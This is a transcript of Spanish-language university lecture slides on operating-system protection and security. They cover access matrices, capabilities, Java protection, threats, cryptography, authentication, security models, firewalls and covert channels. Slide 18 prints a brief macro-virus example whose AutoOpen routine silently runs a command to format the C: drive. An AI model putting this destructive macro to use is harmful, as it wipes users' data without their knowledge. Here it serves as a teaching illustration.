Protección y Seguridad. Módulo 13. Departamento de Ciencias e Ingeniería de la Computación Universidad Nacional del Sur.

Transcripción

1 Protección y Seguridad Módulo 13 Departamento de Ciencias e Ingeniería de la Computación Universidad Nacional del Sur Protección Objetivos de la Protección Principios de la Protección Dominio de Protección Matriz de Acceso Implementación de la Matriz de Acceso Control de Acceso Revocación de los Derechos de Acceso Sistemas Basados en Capacidades Protección Basada en Lenguajes 1

2 Objetivos Discutir los objetivos y principios de la protección en un sistema de computación moderno Explicar como los dominios de protección combinados con las matrices de acceso son usados para especificar como puede un proceso acceder a los recursos Examinnar los sistemas de protección basados en capacidades y lenguajes Objetivos de la Protección El SO consiste de una colección de objetos, hardware o software Cada objeto tiene un único nombre y puede ser accedido por un conjunto de operaciones bien definidas El problema de protección asegura que cada objeto es accedido correctamente y solo por aquellos procesos que les está permitido hacerlo 2

3 Principios de Protección Principio guía principio del menor privilegio Programas, usuarios y sistemas debería obtener suficientes privilegios para realizar sus tareas Estructura de Dominios Derecho de Acceso = <nombre del objeto, conjunto de derechos> donde el conjunto de derechos es un subconjunto de todas las opercaiones válidas que pueden ser realizadas por el objeto. Dominio = conjunto de derechos de acceso 3

4 Implementación de Dominios (UNIX) El sistema consiste de dos dominios: UNIX Usuarios Supervisor Dominio = identificación de usuario Conmutación de dominios realizado via sistema de archivos Cada archivo está asociado a un bit de dominio (setuid bit) Cuando el archivo está ejecutando y el setuid = on, entonces la identificación de usuario es pasada al dueño del archivo en ejecución. Cuando se completa la ejecución la identificación de usuario es retornada a su original. Implementación de Dominio (MULTICS) Sean D i y D j dos anillos de dominio Si j < I D i D j 4

5 Matriz de Acceso Vista de la protección como una matriz (matriz de acceso) Las filas representan dominios Las columnas representan objetos Acceso(i, j) es el conjunto de operaciones que un proceso ejecutando en Dominio i puede invocar sobre un Objeto j Matriz de Acceso 5

6 Uso de la Matriz de Acceso Si un proceso en Dominio D i trata de hacer op sobre el objeto O j, entonces op debe estar en la matriz de acceso Puede ser expandido a protección dinámica Agregar operaciones, borrar derechos de acceso Derechos de acceso especiales: dueño de O i copiar op desde O i a O j control D i puede modificar los derechos de acceso de D j transferencia conmutar del D i a D j Uso de Matriz de Acceso (Cont) La Matriz de Acceso: su diseño separa mecanismos de políticas Mecanismo El SO provee matriz de acceso+ reglas Si la matriz es manipulada solamente por agentes autorizados y las reglas son estrictamente forzadas Políticas El usuario dicta la política Quien puede acceder a que objeto y de que modo 6

7 Implementación de la Matriz de Acceso Cada columna = Lista de control de acceso por un objeto Define quien puede realizar que operación. Dominio 1 = Read, Write Dominio 2 = Read Dominio 3 = Read Cada fila = Lasta de capacidades (como una clave) Para cada dominio que operaciones están permitidas sobre que objetos. Objeto 1 Read Objeto 4 Read, Write, Execute Objeto 5 Read, Write, Delete, Copy Matriz de Acceso con Dominios como Objetos 7

8 Matriz de Acceso con Derechos de Copy Matriz de Acceso con Derechos de Owner 8

9 Matriz de Acceso Modificada Control de Accesos La protección puede ser aplicada a recursos físicos Solaris 10 provee control de accesos basado en roles (RBAC) para implementar privilegios Un privilegio es un derecho a ejecutar llamadas a sistema o usar una opción dentro de una llamada a sistema Puede ser asignado a procesos Los roles asignados a usuarios garantizan accesos a privilegios y programas 9

10 Control de Acceso basado en Roles en Solaris 10 Ejecuta con rol de privilegios 1 Revocación de Derechos de Acceso Lista de Accesos Borra derechos de acceso de la lista de accesos Simple Inmediato Lista de Capacidades Requiere un esquema para localizar capacidades antes que puedan ser revocadas Readquisición Punteros hacia atrás Indirección Claves 10

11 Protección Basada en Lenguajes La especificación de protección en lunguajes de programación permite una descripción en alto nivel de políticas para la alocación y uso de recursos La implementación de languaje puede forzar software para protección cuando la verificación automática soportada por hardware no está disponible Especificación de protección interpretada para generar llamadas donde sea que la protección era llevada a cabo por el hardware y el SO Protección en Java 2 La protección es adminstrada por Java Virtual Machine (JVM) Una clase es asignada para protección de un dominio cuando es cargada por la JVM Protección de dominio indica que operaciones puede (o no puede) realizar la clase Si una librería de métodos es invocada y realiza una operación privilegiada, el stack es inspeccionado para asegurarse que la operación puede ser realizada por la librería 11

12 Inspección del Stack Código Móvil (1) Cajas de Arena Dirección virtual en MB Monitor de referencia para verificación del sistema (a) Memoria dividida en cajas de arena de 1-MB (b) Una forma de verificar la validez de una instrucción 12

13 Código Móvil (2) Los applets pueden ser interpretados por el browser de Web Seguridad 13

14 Seguridad El Problema de Seguridad Programas de Peligrosos Amenazas al Sistema y Redes Criptografía como Herramienta de Seguridad Autenticación de Usuario Implementando Defensas de Seguridad Firewalls para Proteger Sistemas y Redes Clasificaciones de la Seguridad en Computadoras Ejemplo: Windows XP Objetivos Discutir amenazas y ataques a la seguridad Explicar los fundamentos de la encripción, autenticación, y hashing Examinar los usos de la criptografía en computación Describir varias contramedidas a ataques a la seguridad 14

15 El Problema de Seguridad La seguridad debe considerar el ambiente externo del sistema y proteger los recursos del sistema Los intrusos (crackers) intentan romper la seguridad Una amenaza es potencialmente una violación a la seguridad Un Ataque es un intento de romper la seguridad Un ataque puede ser accidental o malicioso Es más fácil proteger contra un uso accidental que que contra uno maliciosos Violaciones de Seguridad Categorías Fallo de confidencialidad Fallo de integridad Fallo de disponibilidad Robo de servicio Negación de Servicio (Denial of service) Métodos Mascarada (brecha de autenticación) Ataque Replay Modificación de Mensajes Ataque Hombre-en-el-Medio Sesión de toma de control 15

16 Ataques Comunes a la Seguridad Niveles de Medidas de Seguridad La seguridad debe existir en cuatro niveles para ser efectiva: Física Humana Evite ingeniería social, phishing, dumpster diving Sistema Operativo Red La seguridad es tan débil como el eslabón más débil de la cadena 16

17 Caballo de Troya Programas Peligrosos Segmento de código que se usa dentro de su ambiente Explota mecanismos que permiten programas escritos por usuarios ser ejecutados por otros usuarios Spyware, pop-up de ventanes en navegadores, canales encubiertos Puerta Trampa Identificador de usuario específico y contraseña que saltea los procedimientos de seguridad normales Pueden ser incluídas en un compilador Bomba Lógica Programa que inicia un incidente bajo ciertas cicunstancias Rebalse de Stack y Buffer Explota un bug en un programa (rebalse en el stack o buffers de memoria) Rebalse de Buffer SP Espacio virtual de direciones Variables locales del principal Espacio virtual de direciones Variables locales del principal dir de retorno Variables locales de A Espacio virtual de direciones Variables locales del principal dir de retorno Variables locales de A Programa Programa Programa (a) Situación cuando el programa principal esta corriendo (b) Luego del llamado al programa A (c) El rebalse de buffer mostrado en gris 17

18 Programas Peligrosos Virus Fragmento de código embebido en un programa legítimo Muy específico a la arquirectura de la CPU, SO, aplicaciones Usualmente nace via o como una macro MacroVisual Basic para modificar el formato de un disco duro Sub AutoOpen() Dim ofs Set ofs = CreateObject( Scripting.FileSystemObject ) vs = Shell( c:command.com /k format c:,vbhide) End Sub Programas Peligrosos (Cont.) Virus dropper inserta virus dentro del sistema Muchas categorías de virus, literalmente muchos miles de virus Archivo Boot Macro Código fuente Polimórfico Encriptado Furtivo Tunneling Multipartite Armored 18

19 Amenazas al Sistema y Red Gusanos (Worms) us mecanismos de spawn; es un programa standalone Worm Internet Explota características de red de UNIX (acceso remoto) y bugs en los programas finger y sendmail Programa Grappling hook levanta el programa principal del gusano Barrido de Pórticos Intento automatizado de conectar un rango de pórticos con una o un rango de direcciones IP Negación de Servicio Sobrecarga la computadora blanco evitando que haga algún trabajo útil Negación de servicios distribuido (Distributed denial-of-service (DDOS)) proviene de múltiples sitios a la vez El Gusano Internet Morris 19

20 Criptografía como Herramienta de Seguridad Herramienta de seguridad ampliamente disponible La fuente y el destino de los mensajes no puede ser confiable sin la criptografía Medio para limitar potenciales emisores (sources) y/o receptores (destinations) de los mensajes Basada en el secreto (keys) Bases de la Criptografía Clave de encriptación Clave de desencriptación Entrada texto plano Algoritmo encriptación Texto cifrado Algoritmo desencriptación Salida texto plano Encriptación Desencriptación Relación entre el texto plano y el texto cifrado 20

21 Criptografía con Clave Secreta Sustitución Monoalfabética cada letra es reemplazada por otra letra diferente Clave de encriptación dada, fácil de obtener la clave de desencriptación Clave criptográfica secreta llamada clave criptográfica simétrica Criptografía con clave Pública Todos los usuarios toman un par de claves: una clave pública y una clave privada publica la clave pública no publica la privada La clave pública es la clave de encriptación La clave privada es la clave de desencriptación 21

22 Firma Digital (1) Computadora de Alice Computadora de Bob clave priv de Alice clave publ de Bob clave priv de Bob clave publ de Alice Firma digital en un mensaje usando criptografía con clave pública. Firma Digital (2) Computadora de Alice Computadora de Bob Función Hash Función Hash clave priv de Alice clave publ de Alice Firma digital en un mensaje usando un digesto. 22

23 Implementando Defensas de Seguridad Defensa en profundidad es la teoría más común de seguridad múltiples capas de seguridad Políticas de seguridad describe que debe asegurarse Evaluación de la vulnerabilidad compara el estado real del sistema/red comparado con la política de seguridad Detección de intrusión busca detectar intentos o intrusiones exitosas Detección basado en firmas Detección de anomalías resalta diferencias con el comportamiento normal Puede detectar ataques zero-day Problemas de Falsos-positivos y falsos-negativos Protección de virus Auditoría, contabilidad, y registro de todas (o específicas) las actividades de red y sistema Autenticación de Usuario Es crucial para identificar correctamente al usuario, dado que el sistema de protección depende del user ID La identidad del usuario es frecuentemente establecida por contraseñas, pueden ser consideradas casos especiales de claves o capacidades También puede incluirse algo útil y/o algún atributo del usuario Las contraseñas deben permanecer secretas Cambios frecuentes de contraseñas Uso de contraseñas no adivinables Registro de todos los intentos de acceso inválidos Las contraseñas pueden ser encriptadas o permitir que se usen una sola vez 23

24 Autenticación (1) Autenticación basada en clave secreta compartida. Autenticación (2) Autenticación basada en clave secreta compartida, pero usando tres mensajes en lugar de cinco. 24

25 Autenticación (3) Primera sesión Segunda sesión Primera sesión El ataque por reflejo. Autenticación Usando Contraseñas Salt Contraseña El uso del salt para derrotar la precomputación de las contraseñas encriptadas. 25

26 Seguridad Multinivel (1) Bell-La Padula (Modelo de Confidencialidad) Nivel de seguridad 4 5 E 6 Leyenda Proceso Objeto 3 3 C 4 D Leer 2 B 2 Escribir 1 1 A Seguridad Multinivel (2) El Modelo Biba Principios para garantizar la integridad de los datos Principio simple de integridad El proceso puede escribir solamente objectos en su nivel de seguridad o inferior La propiedad de integridad El proceso puede leer solamente objectos en su nivel de seguridad o mas alto 26

27 Firewall para Proteger Sistemas y Redes Un firewall de red está ubicado entre hosts confiables y no confiables El firewall limita el acceso a la red entre estos dos dominios de suguridad Puede ser tunneled o spoofed Tunneling permite deshabilitar protocolos para ir dentro de protocolos permitidos (p.e. telnet en of HTTP) Las reglas del firewall están tipicamente basadas en el nombre del host o dirección IP la cual puede ser spoofed Un firewall personal es una capa de software sobre un dado host Puede monitorear / limitar el tráfico desde y hacia el host Firewall con proxy de aplicación entiende protocolos de aplicación y puede controlarlos (p.e. SMTP) Firewall de llamadas a sistema monitorea todas las llamadas al sistema importantes y aplica reglas a ellas (p.e. este programa puede ejecutar tal llamada a sistema) Seguridad en Redes por Separación de Dominios vía Firewall 27

28 Clasificaciones de Seguridad El Departamento de Defensa de EEUU considera la seguridad de las computadoras dividida en cuatro: A, B, C y D D Mínima seguridad C Provee una protección discreta Dividida en C1 y C2 C1 identifica usuarios cooperando con el mismo nivel de protección C2 permite control de acceso a nivel de usuario B Todas las propiedades de C, sin embargo cada objeto puede tener etiquetas únicas de sensinbilidad Dividida en B1, B2, y B3 A Usa técnicas formales de diseño y verificación para asegurar la seguridad El Libro Naranja de la Seguridad (1) El símbolo X significa nuevos requerimientos El símbolo requerimientos desde la siguiente categoría inferior se aplican aquí también 28

29 El Libro Naranja de la Seguridad (2) Canales Encubiertos (1) Cliente Servidor Colaborador Servidor encapsulado Canal cubierto Procesos cliente, servidor y colaborador El servidor encapsulado puede aún fugar datos a un colaborador via canales cubiertos 29

30 Canales Encubiertos (2) Un canal cubierto usando bloqueo de archivos (locking) Canales Cubiertos (3) Los cuadros parecen los mismos El cuadro de la derecha tiene el texto de 5 piezas de Shakespeare encriptadas, insertadas en los bits de bajo orden de los valores de color Zebras Hamlet, Macbeth, Julius Caesar Merchant of Venice, King Lear 30

31 Esteganografía Esta demostración puede encontrarse en: Haga click sobre el encabezamiento STEGANOGRAPHY DEMO luego siga las instrucciones en la página para descargar la imagen y las herramientas de esteganografía necesarias para extraer las piezas. Algunos Textos Stalling, W.; Cryptography and Network Security: Principles and Practice, 2 nd Edition, Prentice Hall, 1999 Schmidt, J.; Seguridad en Windows 2000, Prentice Hall, McClure, S.; Scambray, J.; Kurtz, G. ; Hackers: Secretos y Soluciones para la Seguridad de Redes, McGraw Hill, Escamilla, T.; Intrusion Detection: Network Security Beyond the Firewall, John Wiley, Anónimo, Linux: Máxima Seguridad, Prentice Hall, Jaworski, J.; Perrone, P. J.; Seguridad en Java, Prentice Hall,

32 Fin Módulo 13 Departamento de Ciencias e Ingeniería de la Computación Universidad Nacional del Sur 32